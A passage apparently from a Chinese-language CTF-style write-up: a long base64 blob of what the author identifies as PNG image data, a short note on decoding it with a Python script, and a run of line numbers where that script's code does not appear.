+OhTZKg1Ucmyzk6ehwtlT2qFfk8MElHYBgtgMZRBBZRIBygHy2cVGHbXWAY6cxu0Sf9wq+RUp7dn
rHF5BjaI8bxVnH1ucBDqoM7oMDUDToES2A7AIqg38p890I/H5XVoguVQAxVGUWwkxGEmtPskWx4w
ZJwTwvGBaO5hLhTlEoUThg4nForfwUqjeKnln7LqLzj7KhWJwm0VwmiDHTBNWmgFJBbC+vN+2ONJ
UcpRZfR9ochQsEqSiXEF9EKPmG3acikD3MYP5eZ1aRA9LFtFJkSMtl7pBkx5zCA8C3OhAHoys/Sm
SyM0wjyokt7pffCmc9cvNpTLzA1CHdABpZKv5DuD8JRXD+4Z+ABEjRzdGjgZlsEMyeeKGJkgftEO
L8B8WAgVUC6hIcO51H0mS7FjXyJSWcSzQI1RC0UA+h3KidsFRRK5D4TdCR4oNIYuAm9K5eVWmA8n
QI04vi01aDmcCi+PyUx0FtMYhk+vbakREWGlfE60tL4PKqQvTR805p5DysIP5QbY5dyl7IIQMUl1
yWb6XCg3njrNrm3MRfHpAI6QVXW+vXxwf4H/BQEjLatMnHT1RqpONijxTdJ2YxYUQzGEoDlXV8Ns
YT+cJK9Slx8JzC4tFCH3Y02CxkIUM8yHvTAArVAH88UyarulzoF+2O5aQ027cIOP72yRpAJgdBAa
i9VHvVnCRQ5Cuyed7FzAJ+XGQSLxhQ2GsmxTnCIUGYlg2bDp5jT9sBVWQ5XoNxEJsokY4+xG16HJ
0ZOTLvns5Sj0iF+gw/MW1jlNgVGkLhxvnLB83H0wCPNhOmBk15bDu6EHXoEmp6WKGM4yXwgYET8J
vGPz4BJogw6IwdEc67cwCs8Dih3niNH8IgTD2eHImGqUGKclfE13zA+aYKfUubFXxgKpOhgRPV7H
OV95DI5APezzW5LcImD0Jxlb1gEIwZuwB1rj4xmsHxXCu+B9MMNRqexX2M7E9phiUW6i8Q4ykyr4
BHRDI4TgOBz2r+yhE+S+cnNYpnIUOiXZRPGY8vh3xvMKA3lIA7xmdFG2TDXDMAR9EIM5Os75yyC8
EZ+mp6RCLN5yM5Ea0QI7oEkayYWN84O1fZzutGD22c+lroKJMeOso+NFcRXB9dAD9RCCDjgInbnq
kLLIfbeUFeQ/F0LQCy1+yzNlMStEZW3CWm5hHaGWw3QogSgMQA8MQDFUw0KfKq4qSnZi6xBhSZia
iAF4BRbDIsn4s7DWriGodC7Mzizi50uZ2cJ4j/ZAvE2rCG6CfqiHGHTDAWjPeTNB7is3wD5ogSAM
5bCDMLeZE19cPPcNgtmC1ZZ8JdRIZdVySb0ugnKYptG7iiKY9olUyoIcgk5YDtOM+P2oxLc5RYEc
/CI+KTcFErZh1hewqIFPQL+0TO8VzSanOi2MS77sQp3QrpqNfxTH96zOl2mVFfTCK0a5EbvHZxSq
fBZNUbILs39LOLWFqAtehv1SdGcIWqDX0a5hdrvomGtt3hNTYAT9WO3ZawCYD1fBgFQV74H90JYP
mg15YrlRfKfYcHXbptcsyeXJA6zyzaugSiqhRQ1VUlEUCzMPPPWCrjE4CC0wFwphEI44KlXQ70zS
AsOaFYVpsAKGYQ30wREp6HwA2vxL6XIaVW4UJwgaNs+ohN2ocuMgI/A6nBOflTaU2xF/iuIwUUOz
SffVcK+WVUA8QQlinF0lGG/QikI5TIfj0C7D9Wa+FR1Q5UZxgqjRLSsmLV3UqOAs/dI6A6P3qg6y
otiYLZyypxWPWX0Hn2JuLOWmVMqBxqDP0AUP5JtmgwZHKM4QMsyeYZ/8ylOBwngLc1f+2JAVxQHM
QpfZ0HPXotgIBvLLchOWlbnCyAa3VpJ6aPRDKpdRy43iBGHjzDRRkSglc8weFwNShUxRFAs76dpa
f7LEclMohm2/Wh/abimrVlYjlEMpRKAJjmWNFugoqtwoTjAsJwOgTxp+KY5jR9vEJMhJURSbqOGW
ypK3IyCGk1h8wJzHMljrs9WJvVvKMbdCQ96u1eo8UJxgtxgSBqAXOv2WJ18JG2t3UM8mihJP0HAA
kR2WmxLxkdl1k73Xugpk3bA6sVfBTGiHhpyv1JcAXR0VJ+iDv8FsCEC3FhxyDTuaOALFUOSzOIqS
XQTjfeLZcHgvEmUrZrjvPaYaQrJ6WOuGZbNxsJZP9qHKjeIQ/arTuM+IVFIHgkZNVUVRLCy7SNin
WsBjKTH6HsRg0A/lplBMR5ZfbBBa8lyzITs0W0VRUmPI6LseVeONosQTjK9wkw3KTaHkcEWkB4L3
tanmShykpWZ1iX8qr1HlRlFyhyEjGSQChWp7VRQDu7xW9sTcFButD2J+iFQqXRdjkjDVl7dBxCa6
NCpK7jBsmLjRBuyKEk9QTCMx+afvmBX8fDmQDElj6QIYgTYYyppUMjdR5UZRcofjMDs+oVSVG0Wx
KTICirOkQrHZNdOu3u4xf4Na0fwGXOsykWWocqMouUN3fDLIFDh+KUoaFBi51j42qjQpgpAYXH08
kDRIxZ0p4JCyyAaznaIoKXNY/hKW+ERFUSzM9r1Z0lPWbMcdkb7CvhCbQpoNarlRlByjCSolJWQo
n2twKUra9EON+ICGskP1L4h3S0Wyw540BSjwWwBFUdKkA8LQD91+S6IoWUUfzIRB+dPutzxAAGqM
8n39MKBnEi/IhoArRVEURXGCAFTDSDaVcjlTwoCsSqctarzxAlVuFEVRFMU1glALURiQnABFURRF
URRFURRFURRFURRFURRFURRFURRFURRFURRFURRFURRFURRFURRFURRFURRFURRFURRFURRFURRF
URRFURRFURRFURRFURRFURRFUaYmnZ2dsYQsWrTIbxkVRVEURUlC0G8BFEVRFEVRnESVG0VRFEVR
8opCvwVQspclS5Z84hOfWLJkycjIyD333LNlyxa/JZokF1100aWXXlpTU5PhdYaGhh577LGHH344
6SdPO+20a665Zs6cOT09Pffcc8+rr76a7r0WLFjw8Y9//JRTTiksLPzxj3/84osvTkrkbCdv5liG
uDEOOraeYb+tpaWlGV4qGAz+9Kc/3bRpkyOCKQpozE08d91116iv/9vf/tZvodJm2bJlra2tiR9r
ugwODl5wwQUJbnr33XeP+pV///d/T0vs2267bdQV/vKXv2Q2EtlIfsyxzHFjHHRsPWPs25o527dv
9/trKXmEKjc2P/jBD8YdgWeeecZv0dJg0aJFji86NhPpN7/61a/G/fwjjzySoti33377uFd47bXX
nBsb/8mPOZY5boyDjq1nTPS2Zk57e7vfX07JF1S5sVi3bl2CQbj22mv9FjBV3nrrLUdXmzgGBwfH
3nH9+vUJfuXSSy9NKvOqVasSXOErX/mKC+PkA3kzxzLEjXHQsfWMxG9r5jzwwAN+f0UlL1DlxuKR
Rx5JMAhHjx71W8CU2LBhg6PrzDhs3Lhx1E2feuqpBJ9PxfTyhz/8IcEVrpDImQAAIABJREFUent7
3Rktr8mPOZY5boyDjq1nJH5bHaGystLvb6nkPqrcWDQ1NSUeh3nz5vktY3JuvPFG51aY8Rl7rhoc
HEz8K0njDffs2ZP4CqeeeqprY+Yd+THHMseNcdCx9Yykb2vmbNiwwe9vmatoKvj/JWk2zezZs72R
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
Xbp01qxZngmTWyQu6rVmzZrCwiRpBCtWrEjw01mzZuXEcul2cbNcGQdlIpLOkG3btnkjSSbs2LEj
8QembJU/VW7SIGlLOe055xRJC58vXLjQG0lyjqTl+ZN+IGn1/Zwozz8qC90NcmIclIlI+iI0Nzc7
da/PfOYze/bsicVinZ2djzzyyIwZM5y6clIhk37NfEWVmzTYu3dvgp82Nzcn7QOipMK6deuSfmbZ
smUeSKLkLtrkQckSXnvttR/84AennnoqUFNTc+mll7a3t09Zg4pnqHKTBl/60pcS/PSf//mfvRIk
z7njjjuSfubb3/62B5IouYvbMTeKkgovvPDCuM3Dn3vuOXVruooqN2lQX19/3XXXjfujTZs23Xff
fR7Lk5dcf/3169evT/qxRYsWpZ7YrExBXnnllVSipxXFPS655JIEbRx+85vfeCnMVEOVm/S47777
LrvsslHu/Hvuuee9732vXyLlE7fffnvqKsv111//4IMPBoM6h5XxueWWW7Tbg+IjH/vYxxL8dPXq
1UmDC5VJo+0X0uahhx566KGHPvCBD1RWVpaWlj766KMtLS1+C5XDXHHFFZWVlatXr7788svHjX17
+OGH9+/fP2/evI0bN476wOWXX3755ZdbHzhw4MDDDz/c09PjleBKDvCd73zn+9///uWXX758+fKR
kZHEH66trR07xxRl0iTt17148eKGhgZPZJlyqHIzSfxqlJNPXH311T/72c8SfOChhx76yEc+Yndy
+cQnPvHNb37zn/7pn0Z9zG4H87Of/exb3/pW4tAoZaoxMjJy//33p/jhieaYokyCxYsXJ/7AnDlz
vJFkCqImfcUfvvKVryTWbH74wx9edtllo3rUffnLX54o7MnitttuU0+2kglJ55iipMLatWuTVotO
7LdSMkGVG8UH1q5dm7iP4969ez/72c+O+6P77rvvz3/+c4Lf/fCHP3zFFVdkJJ8ytUk6xxQlKb/4
xS+Sfubiiy9es2aN+7JMRVS5UXwgqdn/85//fIKf3nrrrYl/XRPFlQxJOscUJQFPPPGEVdgmKVu3
bk3xk0paqHKj+EDSAlZ79uxJ8NNdu3Z1dXUl+EBtbW3SUD5FSUDSOaYoYykvL/+Hf/iHpqamDRs2
pP5be/bs+d73vqeFSZ1FlRvFB5K6opPuK4cOHXJOHEUZB1VulBS58sort27d2tnZ2d/f//jjj8+b
N2/UBx5++OF3vOMd1dXVJ5544nXXXTe2N8iNN964b9++WCx29OjRBx54oLy83CvZ8xZVbpScJHGn
i7a2Nm2FoSiKB2zduvWBBx5Ys2bNRGe2888//0Mf+tCWLVt6enqOHDly3333FRUV7dq1a9wP19bW
Xnnllf39/Qmq/ympoMqNkpMkzve+6667PJNEUZQpy0svvZQ4Ivi9733vuG3OzjjjjMQ9L1944QWN
xckEVW6UnGTv3r1f/OIXx/3R5s2bte6+oihuc9FFFyXu8vvYY49t2rRpop++733vS3z9Bx98cJKS
KarcKLnLv/zLv9xwww2j/udDDz10zjnn+CKPoihTiptuuinxB37+858n+OmWLVsSG29WrVqlxptJ
o8qNksPcc889JSUln/zkJ7///e9/8pOfPOWUUy677DK/hVIUZUpw8sknJ/7AkSNHEn/grbfeyvAW
ykRo+wUltxkZGUl8PFIURVGmGmq5URRFURQlr1DlRlEURVGUvEKVG0VRFEVR8gpVbhRFURRFySum
kHLT19eX+AOVlZXeSKJMWZLOMZ2EFknHobe3120ZkjYJ8UCGsWS+jmXD2CqK20wh5Wbbtm2JP6Ct
5xW3STzHamtrZ82a5ZkwWUvScejr69u/f7+rMixdujSxcuOBDOOS4TqWDWOrKB4whZSbO+64I/EH
br31Vm8kUaYsiefYF77wBc8kyWaSjsO//du/uS3DnXfe6bsM45LhOpYNY6soHjCFlJu//vWvDz30
UIIPrF279tprr/VMHmUKkmCOnXvuuTfeeKPH8mQhScdh9+7dX/3qV12V4dprr924caO/MkxEJutY
NoytonjDFFJugMsuu+yee+5J8IF777335ptv9kweZQoy7hy79NJLX3jhBV/kySqSjsOmTZtOP/10
V2X42te+du+99/orQ2Imt45lw9gqimdMuQrFN9xww/e+972PfvSjCxYsWLRo0fr160d94K677rrh
hht+/etf79u3r76+/tlnn/VFTiWPMedYeXn5xz/+8akc77V69eqlS5fOmDFjonHYsWPH/v37e3p6
fvrTn27ZssUNGZYtW7Zq1aply5Zdc801tbW1Yz+wf//+HTt2uCpDWqS1jiWYYx6MraIoPjBnzpwn
nngiNjGdnZ2XXHKJ32I6SYIva5E0SeTQoUOJr7Bq1Sq3Zcicm2++ObEMP/nJT9K9ZtLvlTkejG3m
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
AAAAAACg0f8BeD+YFbp5dlYAAAAASUVORK5CYII=

成功读取该文件,将内容复制后,尝试base64解密,,发现是png的文件头如下图:

使用python脚本将该base64字符串转换为png图片,脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
